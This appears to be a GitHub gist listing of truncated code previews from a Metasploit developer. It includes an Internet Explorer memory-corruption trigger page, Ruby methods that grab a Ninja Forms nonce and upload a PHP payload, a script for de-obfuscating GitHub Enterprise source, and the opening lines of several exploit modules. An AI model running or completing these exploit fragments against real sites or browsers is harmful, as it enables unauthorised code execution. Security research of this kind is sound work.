This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/ruby | |
# | |
# This tool is only used to "decrypt" the github enterprise source code. | |
# | |
# Run in the /data directory of the instance. | |
require "zlib" | |
require "byebug" | |
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
// Case matters, see lib/msf/core/constants.rb | |
// All of these should match up with constants in ::Msf::HttpClients | |
var clients_opera = "Opera"; | |
var clients_ie = "MSIE"; | |
var clients_ff = "Firefox"; | |
var clients_chrome = "Chrome"; | |
var clients_safari = "Safari"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am wchen-r7 on github. | |
* I am wchenr7 (https://keybase.io/wchenr7) on keybase. | |
* I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7 | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<script> | |
function trigger() | |
{ | |
var id_0 = document.createElement("sup"); | |
var id_1 = document.createElement("audio"); | |
document.body.appendChild(id_0); | |
document.body.appendChild(id_1); | |
id_1.applyElement(id_0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
donkeu |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def fetch_ninja_form_nonce | |
uri = normalize_uri(target_uri.path, datastore['FORM_PATH']) | |
res = send_request_cgi( | |
'method' => 'GET', | |
'uri' => uri | |
) | |
puts res.body | |
fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200 | |
res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def generate_mime_message(payload_name, nonce) | |
puts "--- You have nonce: #{nonce.inspect}" | |
data = Rex::MIME::Message.new | |
data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"') | |
data.add_part(nonce, nil, nil, 'form-data; name="security"') | |
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"") | |
data | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = NormalRanking | |
include Msf::Exploit::Remote::HttpServer::HTML | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "IE test", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = NormalRanking | |
include Msf::Exploit::Remote::HttpServer::HTML | |
include Msf::Exploit::RopDb | |
def initialize(info={}) | |
super(update_info(info, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
load "./lib/msf/core/exploit/exe.rb" | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote |
NewerOlder